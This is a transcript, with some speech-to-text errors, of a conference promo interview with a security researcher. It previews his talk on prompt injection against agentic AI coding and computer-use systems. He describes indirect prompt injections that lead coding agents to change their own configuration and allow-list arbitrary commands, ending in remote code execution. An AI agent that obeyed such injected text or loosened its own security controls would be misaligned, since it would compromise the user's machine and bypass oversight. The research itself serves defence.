
[Music]
Hi everyone, Steve here. I'm a volunteer director at large with the Vancouver Island Security Research Society and we're getting ready for the annual Bsides Vancouver Island Security Conference coming up on October 3rd, 2025 at the Victoria Conference Center. This is a grassroots communitydriven cyber security event, and we're proud to keep it accessible, relevant, and packed with sharp minds. Today I want to introduce one of our featured speakers Johan Ratberger. Johan is a security researcher with deep expertise in offensive security and AI systems. His talk is titled Agentic LLM exploiting AI computer use and coding. In this session, Johan will demonstrate how prompt injection attacks can compromise agentic systems those autonomous AI agents that perform tasks like coding
file access and decision-making. He'll be showcasing exploits against various platforms like Open AI's operator and others. Johan, thanks for joining us. Can you introduce yourself and give our community a quick preview of what you'll be sharing at Bides? >> Yeah, sure thing. Thanks for having me on this brief interview. I'm really excited to speak again at uh Besides Vancouver Island. And yeah, so my name is Johan. Basically a security tester throughout my entire career. I started at Microsoft. Did a lot of penetration testing. started uh building out a red team in Azure data and then I worked uh at Uber for a while building out a red team. Currently professionally I'm the red team director for the enterprise red
team at electronic arts but as you said like I do a lot of like security research and so on with AI systems which is really sort of my my big passion and yeah so that's pretty much it. Thanks for sharing. Uh that's great and we're very very happy to have you again this year. While we have you, I'd like to ask you two questions, Johan. What makes Agentic systems more vulnerable to prompt injection than traditional LLMs? >> Oh, that's a good question. I don't know if they necessarily more vulnerable. The thing might be to highlight that actually the impact is becoming bigger and bigger when there is a problem. Initially, we had chat bots that had
very few capabilities. Uh, and you know, you could like modify content. You had loss of integrity. Maybe there was some integration with tools or image rendering where we achieved data excfiltration and so on. But with a gentic systems uh the stakes just become a lot higher. Right now we have systems that can entirely autonomously operate a computer or write code or a lot of people this is actually where the talk my talk is going to go in a lot of detail. When you start running some of these agents on your own computer, right, you're basically sometimes might not be aware that you hand over your entire system to a large language model that cannot be trusted implicitly.
That's sort of kind of also the focus on the talk is highlighting some of these exploits that I found over the last couple months. That's great. Thanks. And last question before we let you go, can you walk us through one of your most surprising exploits? What happened and how did the AI respond? So I think one of the most interesting realizations I had over the last four or five months was that there's a new class of problem that seems in retrospect very obvious but I found this in multiple coding agents including GitHub Copilot as well as Amazon Q developer and AWS Cairo is this idea that an agent can modify its own environment and that allows it to
reconfigure its security controls like it can basically allow list its own capabilities or create additional yeah allow basically allow list its own capabilities like running arbitrary commands and so on and it can do this by itself and an attacker can exploit that during an indirect prompt injection attack to basically achieve remote code execution and this is sort of one of the big interesting realizations I had over the last couple months >> that's absolutely frightening and I really look forward to seeing your talk working in the legal uh industry we're very much focusing on deploying LLMs and all of that. Uh so this is very pertinent and relevant to me. Thank you so much Yan for taking the time
everyone. Tickets are available now. If you grab yours before Friday, September 19th, you'll get an exclusive customdesigned black hacker style t-shirt in your size. It's a limited run and a great way to boost your hacker cred. We're also active on social media. Find all the links at our website and follow the conversation using the hashtag besides vi. Join us for a day of learning, hacking, and connecting with the cyber security community. See you in Victoria again. Johan, thanks so much and looking forward to seeing you. Yeah, also looking forward to it.